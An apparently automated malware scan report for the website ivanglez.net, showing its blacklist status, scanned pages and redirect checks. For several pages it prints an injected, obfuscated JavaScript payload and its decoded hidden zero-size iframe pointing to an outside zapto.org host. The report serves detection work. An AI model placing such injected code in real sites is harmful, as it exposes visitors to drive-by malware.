Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ivanglez.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ivanglez.net/ | 200 OK Content-Length: 9250 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://ivanglez.net/test/apacheasp/test.asp | 200 OK Content-Length: 645 Content-Type: text/html | clean |
http://ivanglez.net/test404page.js | 404 Not Found Content-Length: 3343 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://ivanglez.net/test/ssi/test.shtml | 200 OK Content-Length: 1441 Content-Type: text/html | clean |
http://ivanglez.net/test/php/test.php | 200 OK Content-Length: 1088 Content-Type: text/html | clean |
http://ivanglez.net/test/coldfusion/test.cfm | 200 OK Content-Length: 660 Content-Type: text/html | clean |
http://ivanglez.net/test/perl/test.pl | 200 OK Content-Length: 767 Content-Type: text/html | clean |
http://ivanglez.net/test/python/test.py | 200 OK Content-Length: 1204 Content-Type: text/plain | clean |
http://ivanglez.net/test/fcgi/test.fcgi | 403 Forbidden Content-Length: 3342 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://ivanglez.net/test/miva/test.mvc? | 200 OK Content-Length: 6326 Content-Type: text/plain | clean |
http://ivanglez.net/test/miva/documenturlTest=sysvars[Run]</A></TR>
Test Data Directory
Test=datadir
Test Script Directory
Test=scriptdir</TABLE></P>test_systemvariablessysvarlistposcurrent,
test_datadirectoryok
Testing writes to data directory:
diag.dats.time_t, s.version, s.apitype|MvEXPORT_Error
Testing reads from data directory:
l.time_t, l.version, l.apity <span>...170 symbols skipped</span> | 404 Not Found Content-Length: 3343 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ivanglez.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 15:17:25 GMT
Accept-Ranges: bytes
ETag: "51dff9aa-2422"
Server: nginx
Content-Length: 9250
Content-Type: text/html
Last-Modified: Fri, 12 Jul 2013 12:42:18 GMT
X-Powered-By: PleskLin
...9250 bytes of data.
GET / HTTP/1.1
Host: ivanglez.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 15:17:25 GMT
Accept-Ranges: bytes
ETag: "51dff9aa-2422"
Server: nginx
Content-Length: 9250
Content-Type: text/html
Last-Modified: Fri, 12 Jul 2013 12:42:18 GMT
X-Powered-By: PleskLin
...9250 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ivanglez.net
Referer: http://www.google.com/search?q=ivanglez.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ivanglez.net
Referer: http://www.google.com/search?q=ivanglez.net
Result:
The result is similar to the first query. There are no suspicious redirects found.